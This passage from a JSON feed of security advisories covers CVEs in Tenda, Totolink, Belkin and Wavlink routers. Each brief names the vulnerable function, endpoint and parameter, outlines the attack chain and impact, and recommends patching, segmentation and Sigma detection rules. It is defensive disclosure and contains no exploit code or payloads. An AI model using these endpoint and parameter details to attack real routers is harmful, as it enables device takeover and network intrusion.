to control network traffic, access sensitive information, or use the router as a launchpad for further attacks within the network. Given the severity and the existence of public exploits, vulnerable routers are at high risk of being targeted.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eApply any available firmware updates from Tenda to patch CVE-2026-5567.\u003c/li\u003e\n\u003cli\u003eMonitor web server logs for suspicious POST requests to \u003ccode\u003e/goform/setAdvPolicyData\u003c/code\u003e with unusually long \u003ccode\u003epolicyType\u003c/code\u003e arguments; deploy the Sigma rule \u003ccode\u003eDetect Suspicious PolicyType Argument Length\u003c/code\u003e to identify this activity.\u003c/li\u003e\n\u003cli\u003eImplement network segmentation to limit the potential impact of a compromised router.\u003c/li\u003e\n\u003cli\u003eConsider using a web application firewall (WAF) to filter malicious requests targeting the affected endpoint.\u003c/li\u003e\n\u003cli\u003eReview and restrict access to the router\u0026rsquo;s management interface to authorized personnel only.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-05T13:17:14Z","date_published":"2026-04-05T13:17:14Z","id":"/briefs/2026-04-tenda-m3-overflow/","summary":"A buffer overflow vulnerability exists in Tenda M3 1.0.0.10 via manipulation of the policyType argument in the setAdvPolicyData function, allowing remote attackers to execute arbitrary code.","title":"Tenda M3 Router Buffer Overflow Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-04-tenda-m3-overflow/"},{"_cs_actors":[],"_cs_cves":[{"cvss":8.8,"id":"CVE-2026-5550"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["cve-2026-5550","tenda","buffer-overflow","router"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA critical stack-based buffer overflow vulnerability, identified as CVE-2026-5550, exists in Tenda AC10 router firmware version 16.03.10.10_multi_TDE01. The vulnerability is located in the \u003ccode\u003efromSysToolChangePwd\u003c/code\u003e function within the \u003ccode\u003e/bin/httpd\u003c/code\u003e binary. A remote attacker can exploit this flaw to overwrite the stack and potentially execute arbitrary code on the affected device. This is achieved by sending a specially crafted request to the device. Successful exploitation could lead to complete system compromise, allowing attackers to gain unauthorized access, control the device, or use it as a foothold for further network intrusion. Given the widespread use of Tenda routers, this vulnerability poses a significant risk to home and small business networks.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a Tenda AC10 router running firmware version 16.03.10.10_multi_TDE01.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious HTTP request targeting the \u003ccode\u003e/bin/httpd\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eThe malicious request is designed to overflow the buffer in the \u003ccode\u003efromSysToolChangePwd\u003c/code\u003e function when processing the request parameters.\u003c/li\u003e\n\u003cli\u003eThe overflow overwrites the stack with attacker-controlled data, including the return address.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003ehttpd\u003c/code\u003e process attempts to return from the \u003ccode\u003efromSysToolChangePwd\u003c/code\u003e function.\u003c/li\u003e\n\u003cli\u003eDue to the overwritten return address, execution is redirected to the attacker\u0026rsquo;s code.\u003c/li\u003e\n\u003cli\u003eThe attacker\u0026rsquo;s code executes with the privileges of the \u003ccode\u003ehttpd\u003c/code\u003e process.\u003c/li\u003e\n\u003cli\u003eThe attacker gains control of the device and can perform arbitrary actions, such as modifying router settings, executing commands, or establishing a backdoor.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2026-5550 allows a remote attacker to gain complete control of the affected Tenda AC10 router. This can lead to data breaches, denial-of-service attacks, or the router being used as part of a botnet. Given the potential for widespread exploitation and the ease with which the vulnerability can be triggered, CVE-2026-5550 poses a high risk to users of the affected Tenda AC10 router model. The attacker could potentially monitor all network traffic passing through the device, steal sensitive information, or use the compromised device to launch attacks against other systems on the network or the internet.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor web server logs for suspicious POST requests to \u003ccode\u003e/bin/httpd\u003c/code\u003e with abnormally large parameter values that could indicate a buffer overflow attempt targeting the \u003ccode\u003efromSysToolChangePwd\u003c/code\u003e function to trigger the vulnerability (see the related Sigma rule below).\u003c/li\u003e\n\u003cli\u003eSince a patch is not mentioned, consider replacing the affected Tenda AC10 device or isolating it from critical network segments if immediate replacement is not feasible.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rules in this brief to your SIEM and tune for your environment.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-05T08:16:25Z","date_published":"2026-04-05T08:16:25Z","id":"/briefs/2026-04-tenda-ac10-overflow/","summary":"A stack-based buffer overflow vulnerability (CVE-2026-5550) in Tenda AC10 firmware version 16.03.10.10_multi_TDE01 within the /bin/httpd SysToolChangePwd function allows remote attackers to execute arbitrary code.","title":"Tenda AC10 Stack-Based Buffer Overflow Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-04-tenda-ac10-overflow/"},{"_cs_actors":[],"_cs_cves":[{"cvss":7.3,"id":"CVE-2026-5526"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["cve-2026-5526","tenda","router","access-control"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA security vulnerability, identified as CVE-2026-5526, affects the Tenda 4G03 Pro router, specifically versions up to 1.0/1.1/04.03.01.53/192.168.0.1. The flaw resides within an unspecified function of the \u003ccode\u003e/bin/httpd\u003c/code\u003e file, leading to improper access controls. A remote attacker could exploit this vulnerability, potentially gaining unauthorized access to the device. Publicly available exploits exist, increasing the risk of exploitation. This issue was reported on April 4, 2026, and poses a significant threat due to the ease of remote exploitation.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker identifies a Tenda 4G03 Pro router with a publicly accessible web interface.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious HTTP request targeting the \u003ccode\u003e/bin/httpd\u003c/code\u003e file.\u003c/li\u003e\n\u003cli\u003eThe malicious request exploits the improper access control vulnerability (CVE-2026-5526).\u003c/li\u003e\n\u003cli\u003eThe router\u0026rsquo;s \u003ccode\u003e/bin/httpd\u003c/code\u003e process improperly handles the request, bypassing access controls.\u003c/li\u003e\n\u003cli\u003eThe attacker gains unauthorized access to sensitive functionalities of the router.\u003c/li\u003e\n\u003cli\u003eThe attacker modifies router configurations, such as DNS settings or firewall rules.\u003c/li\u003e\n\u003cli\u003eThe attacker could potentially use the compromised router as a pivot point for further network attacks.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2026-5526 could allow attackers to remotely compromise Tenda 4G03 Pro routers. This can lead to unauthorized access to the device\u0026rsquo;s configuration, modification of settings, or use of the router as a stepping stone for further attacks within the network. Given the availability of public exploits, unpatched devices are at significant risk. While the exact number of affected devices is unknown, the widespread use of Tenda routers makes this a potentially significant issue.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor web server logs for suspicious requests targeting \u003ccode\u003e/bin/httpd\u003c/code\u003e using the provided Sigma rule.\u003c/li\u003e\n\u003cli\u003eApply available firmware updates or patches from Tenda to address CVE-2026-5526 as soon as they are released.\u003c/li\u003e\n\u003cli\u003eImplement network segmentation to limit the impact of a compromised router.\u003c/li\u003e\n\u003cli\u003eEnforce strong password policies for router administration to prevent unauthorized access.\u003c/li\u003e\n\u003cli\u003eReview and update firewall rules to restrict access to the router\u0026rsquo;s web interface from untrusted networks.\u003c/li\u003e\n\u003cli\u003eDeploy the provided Sigma rule to detect suspicious process execution originating from the web server process.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-04T23:16:44Z","date_published":"2026-04-04T23:16:44Z","id":"/briefs/2026-04-tenda-4g03-pro-access-control/","summary":"CVE-2026-5526 describes an improper access control vulnerability in the Tenda 4G03 Pro router's /bin/httpd file, allowing remote attackers to potentially gain unauthorized access.","title":"Tenda 4G03 Pro Improper Access Control Vulnerability (CVE-2026-5526)","url":"https://feed.craftedsignal.io/briefs/2026-04-tenda-4g03-pro-access-control/"},{"_cs_actors":[],"_cs_cves":[{"cvss":8.8,"id":"CVE-2026-5204"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["cve-2026-5204","tenda","buffer-overflow","router"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eCVE-2026-5204 describes a critical stack-based buffer overflow vulnerability affecting Tenda CH22 router version 1.0.0.1. The vulnerability resides within the \u003ccode\u003eformWebTypeLibrary\u003c/code\u003e function in the \u003ccode\u003e/goform/webtypelibrary\u003c/code\u003e file, which handles web-based parameter input. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the router, manipulating the \u003ccode\u003ewebSiteId\u003c/code\u003e argument to overwrite the stack buffer. This allows for arbitrary code execution on the device. Given the router\u0026rsquo;s role as a network gateway, successful exploitation can lead to complete compromise of the device and potentially the entire network behind it. The availability of a public exploit increases the risk of widespread exploitation.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a vulnerable Tenda CH22 router running firmware version 1.0.0.1.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious HTTP POST request targeting the \u003ccode\u003e/goform/webtypelibrary\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eThe crafted request includes the \u003ccode\u003ewebSiteId\u003c/code\u003e parameter with a payload exceeding the expected buffer size, triggering the stack-based buffer overflow in the \u003ccode\u003eformWebTypeLibrary\u003c/code\u003e function.\u003c/li\u003e\n\u003cli\u003eThe overflow overwrites critical data on the stack, including the return address.\u003c/li\u003e\n\u003cli\u003eThe overwritten return address is replaced with the address of malicious code injected into the payload or a pre-existing code location within the router\u0026rsquo;s firmware (Return-Oriented Programming - ROP).\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003eformWebTypeLibrary\u003c/code\u003e function returns, transferring control to the attacker-controlled code.\u003c/li\u003e\n\u003cli\u003eThe attacker\u0026rsquo;s code executes, granting the attacker control over the device.\u003c/li\u003e\n\u003cli\u003eThe attacker can then use this control to further compromise the network or disrupt services.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2026-5204 allows a remote attacker to execute arbitrary code on the vulnerable Tenda CH22 router. This can lead to complete control of the device, enabling the attacker to intercept network traffic, modify DNS settings, create VPNs, or launch further attacks on devices within the network. Given that routers are essential network devices, a successful attack can have a significant impact, affecting all connected devices and potentially exposing sensitive data.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eApply available firmware updates for Tenda CH22 routers immediately to patch CVE-2026-5204.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eTenda-CH22-WebSiteId-Buffer-Overflow\u003c/code\u003e to detect exploitation attempts targeting the vulnerable endpoint.\u003c/li\u003e\n\u003cli\u003eMonitor web server logs for suspicious POST requests to \u003ccode\u003e/goform/webtypelibrary\u003c/code\u003e with unusually long \u003ccode\u003ewebSiteId\u003c/code\u003e parameters, as indicated by \u003ccode\u003eWebSiteId_Length_Detection\u003c/code\u003e Sigma rule.\u003c/li\u003e\n\u003cli\u003eImplement network segmentation to limit the impact of a potential router compromise.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-31T16:16:35Z","date_published":"2026-03-31T16:16:35Z","id":"/briefs/2026-03-tenda-ch22-bo/","summary":"A stack-based buffer overflow vulnerability (CVE-2026-5204) exists in the Tenda CH22 1.0.0.1 router, allowing remote attackers to execute arbitrary code by manipulating the webSiteId argument in the formWebTypeLibrary function.","title":"Tenda CH22 Stack-Based Buffer Overflow Vulnerability (CVE-2026-5204)","url":"https://feed.craftedsignal.io/briefs/2026-03-tenda-ch22-bo/"},{"_cs_actors":[],"_cs_cves":[{"cvss":7.3,"id":"CVE-2026-5176"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["command-injection","cve-2026-5176","totolink","router"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA command injection vulnerability, identified as CVE-2026-5176, has been discovered in Totolink A3300R routers running firmware version 17.0.0cu.557_b20221024. The vulnerability resides within the \u003ccode\u003esetSyslogCfg\u003c/code\u003e function located in the \u003ccode\u003e/cgi-bin/cstecgi.cgi\u003c/code\u003e file. An unauthenticated, remote attacker can exploit this flaw by manipulating arguments passed to the vulnerable function. This manipulation results in the execution of arbitrary commands on the affected device. Given the public…\u003c/p\u003e\n","date_modified":"2026-03-31T02:15:59Z","date_published":"2026-03-31T02:15:59Z","id":"/briefs/2026-03-totolink-cve-2026-5176/","summary":"A command injection vulnerability (CVE-2026-5176) exists in the setSyslogCfg function of the Totolink A3300R router version 17.0.0cu.557_b20221024, allowing remote attackers to execute arbitrary commands by manipulating arguments in the /cgi-bin/cstecgi.cgi file.","title":"Totolink A3300R Command Injection Vulnerability (CVE-2026-5176)","url":"https://feed.craftedsignal.io/briefs/2026-03-totolink-cve-2026-5176/"},{"_cs_actors":[],"_cs_cves":[{"cvss":8.8,"id":"CVE-2026-5156"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["cve-2026-5156","buffer-overflow","tenda","router"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA stack-based buffer overflow vulnerability has been identified in Tenda CH22 router version 1.0.0.1. The vulnerability resides within the \u003ccode\u003eformQuickIndex\u003c/code\u003e function of the \u003ccode\u003e/goform/QuickIndex\u003c/code\u003e file, which is a component of the Parameter Handler. This flaw can be triggered by manipulating the \u003ccode\u003emit_linktype\u003c/code\u003e argument, leading to a buffer overflow on the stack. The vulnerability is remotely exploitable, meaning an attacker can trigger the flaw over the network without needing local access to the device. The existence of a public exploit further increases the risk of potential exploitation by malicious actors. Successful exploitation could allow an attacker to execute arbitrary code on the device.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker identifies a vulnerable Tenda CH22 router running firmware version 1.0.0.1 exposed to the internet.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious HTTP POST request targeting the \u003ccode\u003e/goform/QuickIndex\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eThe malicious request includes the \u003ccode\u003emit_linktype\u003c/code\u003e argument with a payload exceeding the expected buffer size.\u003c/li\u003e\n\u003cli\u003eThe Tenda CH22 router processes the HTTP request and passes the \u003ccode\u003emit_linktype\u003c/code\u003e argument to the \u003ccode\u003eformQuickIndex\u003c/code\u003e function.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003eformQuickIndex\u003c/code\u003e function copies the attacker-controlled \u003ccode\u003emit_linktype\u003c/code\u003e data into a fixed-size buffer on the stack without proper bounds checking.\u003c/li\u003e\n\u003cli\u003eDue to the oversized payload, the copy operation overflows the buffer, overwriting adjacent memory on the stack, including the return address.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003eformQuickIndex\u003c/code\u003e function completes and attempts to return to the caller function.\u003c/li\u003e\n\u003cli\u003eDue to the overwritten return address, control is redirected to attacker-controlled code, enabling arbitrary code execution.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability allows an attacker to execute arbitrary code on the Tenda CH22 router. This can lead to a variety of malicious outcomes, including complete device compromise, denial of service, and the potential to use the router as a launchpad for further attacks on the local network or the internet. Given that routers are often used in both home and small business environments, a successful attack could affect a wide range of users and organizations.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor web server logs for POST requests to \u003ccode\u003e/goform/QuickIndex\u003c/code\u003e with unusually long \u003ccode\u003emit_linktype\u003c/code\u003e parameters to detect potential exploitation attempts. Implement the Sigma rule \u003ccode\u003eDetect Tenda CH22 mit_linktype Buffer Overflow Attempt\u003c/code\u003e against web server logs.\u003c/li\u003e\n\u003cli\u003eImplement rate limiting on the \u003ccode\u003e/goform/QuickIndex\u003c/code\u003e endpoint to mitigate potential denial-of-service attacks stemming from exploitation.\u003c/li\u003e\n\u003cli\u003eSince the source material identifies CWE-119 and CWE-121 as root causes, review code practices related to buffer handling and implement stricter input validation procedures.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-31T00:16:15Z","date_published":"2026-03-31T00:16:15Z","id":"/briefs/2026-03-tenda-ch22-overflow/","summary":"A stack-based buffer overflow vulnerability exists in Tenda CH22 1.0.0.1 via manipulation of the `mit_linktype` argument in the `/goform/QuickIndex` endpoint, potentially enabling remote code execution.","title":"Tenda CH22 Router Stack-Based Buffer Overflow Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-03-tenda-ch22-overflow/"},{"_cs_actors":[],"_cs_cves":[{"cvss":8.8,"id":"CVE-2026-5154"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["cve-2026-5154","tenda","buffer-overflow","router"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA critical stack-based buffer overflow vulnerability, identified as CVE-2026-5154, has been discovered in Tenda CH22 firmware version 1.0.0.1/1.If. The vulnerability resides within the \u003ccode\u003efromSetCfm\u003c/code\u003e function in the \u003ccode\u003e/goform/setcfm\u003c/code\u003e file, a component of the Parameter Handler. Successful exploitation allows remote attackers to execute arbitrary code on the device. Publicly available exploits exist, increasing the risk of widespread exploitation. This vulnerability poses a significant threat to affected Tenda CH22 devices, potentially leading to complete system compromise.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker identifies a Tenda CH22 device running firmware version 1.0.0.1/1.If.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious HTTP POST request targeting the \u003ccode\u003e/goform/setcfm\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eThe request includes the \u003ccode\u003efuncname\u003c/code\u003e argument containing a string exceeding the buffer size allocated to it.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003efromSetCfm\u003c/code\u003e function processes the malicious \u003ccode\u003efuncname\u003c/code\u003e argument without proper bounds checking.\u003c/li\u003e\n\u003cli\u003eThe oversized \u003ccode\u003efuncname\u003c/code\u003e value overflows the stack buffer, overwriting adjacent memory regions.\u003c/li\u003e\n\u003cli\u003eThe attacker overwrites the return address on the stack with an address pointing to malicious code or a ROP chain.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003efromSetCfm\u003c/code\u003e function returns, causing execution to jump to the attacker-controlled address.\u003c/li\u003e\n\u003cli\u003eThe attacker gains arbitrary code execution on the device, potentially leading to full system compromise.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability allows a remote, unauthenticated attacker to execute arbitrary code on the affected Tenda CH22 device. This can result in complete device compromise, allowing the attacker to control the device, steal sensitive information, or use the device as a foothold for further attacks on the network. Given the availability of public exploits, a large number of devices could be compromised if left unpatched.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor web server logs for suspicious POST requests to \u003ccode\u003e/goform/setcfm\u003c/code\u003e with unusually long \u003ccode\u003efuncname\u003c/code\u003e parameters, using the provided Sigma rule.\u003c/li\u003e\n\u003cli\u003eImplement rate limiting on requests to \u003ccode\u003e/goform/setcfm\u003c/code\u003e to mitigate potential brute-force exploitation attempts.\u003c/li\u003e\n\u003cli\u003eApply any available patches or firmware updates from Tenda to address CVE-2026-5154.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-30T23:17:04Z","date_published":"2026-03-30T23:17:04Z","id":"/briefs/2026-03-tenda-ch22-buffer-overflow/","summary":"A stack-based buffer overflow vulnerability exists in Tenda CH22 1.0.0.1/1.If allowing remote attackers to execute arbitrary code by manipulating the `funcname` argument in the `/goform/setcfm` endpoint.","title":"Tenda CH22 Stack-Based Buffer Overflow Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-03-tenda-ch22-buffer-overflow/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["CVE-2026-5046","tenda","buffer-overflow","router"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eCVE-2026-5046 is a stack-based buffer overflow vulnerability affecting Tenda FH1201 routers running firmware version 1.2.0.14(408). The vulnerability resides within the \u003ccode\u003eformWrlExtraSet\u003c/code\u003e function of the \u003ccode\u003e/goform/WrlExtraSet\u003c/code\u003e component, specifically in the handling of the \u003ccode\u003eGO\u003c/code\u003e argument. A remote attacker can exploit this flaw by sending a crafted HTTP request with a maliciously oversized \u003ccode\u003eGO\u003c/code\u003e parameter, overwriting the stack and potentially gaining arbitrary code execution on the device. The…\u003c/p\u003e\n","date_modified":"2026-03-29T15:16:36Z","date_published":"2026-03-29T15:16:36Z","id":"/briefs/2026-03-tenda-overflow/","summary":"A stack-based buffer overflow vulnerability (CVE-2026-5046) in Tenda FH1201 version 1.2.0.14(408) allows remote attackers to execute arbitrary code by manipulating the GO argument in the formWrlExtraSet function of the /goform/WrlExtraSet component.","title":"Tenda FH1201 Stack-Based Buffer Overflow Vulnerability (CVE-2026-5046)","url":"https://feed.craftedsignal.io/briefs/2026-03-tenda-overflow/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["cve-2026-5044","buffer-overflow","belkin","router"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA critical security vulnerability, CVE-2026-5044, has been identified in Belkin F9K1122 router version 1.00.33. The vulnerability resides within the \u003ccode\u003eformSetSystemSettings\u003c/code\u003e function of the \u003ccode\u003e/goform/formSetSystemSettings\u003c/code\u003e file, which is part of the Setting Handler component. Successful exploitation allows a remote attacker to trigger a stack-based buffer overflow by manipulating the \u003ccode\u003ewebpage\u003c/code\u003e argument. This could result in arbitrary code execution on the device. Publicly available exploit code…\u003c/p\u003e\n","date_modified":"2026-03-29T13:17:03Z","date_published":"2026-03-29T13:17:03Z","id":"/briefs/2026-03-belkin-overflow/","summary":"A stack-based buffer overflow vulnerability (CVE-2026-5044) in Belkin F9K1122 version 1.00.33 allows remote attackers to execute arbitrary code by manipulating the 'webpage' argument in the formSetSystemSettings function, potentially leading to complete system compromise.","title":"Belkin F9K1122 Stack-Based Buffer Overflow Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-03-belkin-overflow/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["cve-2026-5042","buffer-overflow","router"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA critical stack-based buffer overflow vulnerability, identified as CVE-2026-5042, has been discovered in Belkin F9K1122 routers running firmware version 1.00.33. The vulnerability resides within the \u003ccode\u003eformCrossBandSwitch\u003c/code\u003e function of the \u003ccode\u003e/goform/formCrossBandSwitch\u003c/code\u003e file, a component of the Parameter Handler. Successful exploitation could allow a remote, unauthenticated attacker to execute arbitrary code on the device. Publicly available exploit code increases the risk of widespread…\u003c/p\u003e\n","date_modified":"2026-03-29T11:16:34Z","date_published":"2026-03-29T11:16:34Z","id":"/briefs/2026-03-belkin-buffer-overflow/","summary":"A stack-based buffer overflow vulnerability (CVE-2026-5042) exists in the Belkin F9K1122 router version 1.00.33, allowing remote attackers to execute arbitrary code by manipulating the webpage argument in the formCrossBandSwitch function.","title":"Belkin F9K1122 Router Stack-Based Buffer Overflow Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-03-belkin-buffer-overflow/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["cve-2026-5036","buffer-overflow","router","tenda"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA stack-based buffer overflow vulnerability, identified as CVE-2026-5036, affects the Tenda 4G06 router, specifically version 04.06.01.29. The vulnerability resides in the \u003ccode\u003efromDhcpListClient\u003c/code\u003e function within the \u003ccode\u003e/goform/DhcpListClient\u003c/code\u003e endpoint. A remote attacker can exploit this by crafting a malicious request that manipulates the \u003ccode\u003epage\u003c/code\u003e argument, leading to a buffer overflow on the stack. This could allow the attacker to potentially execute arbitrary code on the device. Given the…\u003c/p\u003e\n","date_modified":"2026-03-29T08:15:56Z","date_published":"2026-03-29T08:15:56Z","id":"/briefs/2026-03-tenda-4g06-bo/","summary":"A stack-based buffer overflow vulnerability (CVE-2026-5036) exists in the fromDhcpListClient function of the Tenda 4G06 router (version 04.06.01.29), potentially allowing remote attackers to execute arbitrary code by manipulating the 'page' argument in the /goform/DhcpListClient endpoint.","title":"Tenda 4G06 Router Stack-Based Buffer Overflow Vulnerability (CVE-2026-5036)","url":"https://feed.craftedsignal.io/briefs/2026-03-tenda-4g06-bo/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["cve-2026-5021","buffer-overflow","router"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA stack-based buffer overflow vulnerability, identified as CVE-2026-5021, has been discovered in Tenda F453 router version 1.0.0.3. This vulnerability resides within the \u003ccode\u003efromPPTPUserSetting\u003c/code\u003e function of the \u003ccode\u003e/goform/PPTPUserSetting\u003c/code\u003e component, specifically in the \u003ccode\u003ehttpd\u003c/code\u003e process. The vulnerability can be triggered by manipulating the \u003ccode\u003edelno\u003c/code\u003e argument. Successful exploitation allows remote attackers to potentially execute arbitrary code on the affected device. Publicly available exploit code…\u003c/p\u003e\n","date_modified":"2026-03-29T02:16:17Z","date_published":"2026-03-29T02:16:17Z","id":"/briefs/2026-03-tenda-f453-overflow/","summary":"A stack-based buffer overflow vulnerability in Tenda F453 1.0.0.3 allows a remote attacker to execute arbitrary code by manipulating the 'delno' argument in the fromPPTPUserSetting function of the /goform/PPTPUserSetting component's httpd process.","title":"Tenda F453 Stack-Based Buffer Overflow Vulnerability (CVE-2026-5021)","url":"https://feed.craftedsignal.io/briefs/2026-03-tenda-f453-overflow/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["cve","buffer-overflow","router"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA critical vulnerability, identified as CVE-2026-5004, affects the Wavlink WL-WN579X3-C 231124 router. The vulnerability lies within the UPNP Handler component, specifically the \u003ccode\u003e/cgi-bin/firewall.cgi\u003c/code\u003e file\u0026rsquo;s \u003ccode\u003esub_4019FC\u003c/code\u003e function. By manipulating the \u003ccode\u003eUpnpEnabled\u003c/code\u003e argument, a remote attacker can trigger a stack-based buffer overflow. This can lead to arbitrary code execution on the device. Public exploits for this vulnerability are available, increasing the risk of widespread exploitation. Despite responsible disclosure attempts, the vendor has not provided a patch or response, leaving users vulnerable. This is a significant concern for network security, especially for devices exposed to the internet.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a vulnerable Wavlink WL-WN579X3-C 231124 router exposed to the internet.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious HTTP request targeting \u003ccode\u003e/cgi-bin/firewall.cgi\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe HTTP request includes a manipulated \u003ccode\u003eUpnpEnabled\u003c/code\u003e argument designed to overflow the buffer in the \u003ccode\u003esub_4019FC\u003c/code\u003e function.\u003c/li\u003e\n\u003cli\u003eThe vulnerable \u003ccode\u003esub_4019FC\u003c/code\u003e function processes the \u003ccode\u003eUpnpEnabled\u003c/code\u003e argument without proper bounds checking.\u003c/li\u003e\n\u003cli\u003eThe buffer overflow occurs, overwriting adjacent memory on the stack, including the return address.\u003c/li\u003e\n\u003cli\u003eThe overwritten return address points to attacker-controlled code.\u003c/li\u003e\n\u003cli\u003eUpon function return, execution jumps to the attacker-controlled code, allowing arbitrary commands to be executed.\u003c/li\u003e\n\u003cli\u003eThe attacker gains remote code execution, potentially allowing complete control of the device, including network access and data exfiltration.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2026-5004 allows a remote attacker to execute arbitrary code on the vulnerable Wavlink WL-WN579X3-C 231124 router. This could lead to complete device compromise, including unauthorized network access, data exfiltration, and the potential use of the router as a botnet node. Given the availability of public exploits, a widespread exploitation is possible, affecting potentially thousands of devices. The lack of vendor response exacerbates the risk, as no official patch is available.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect 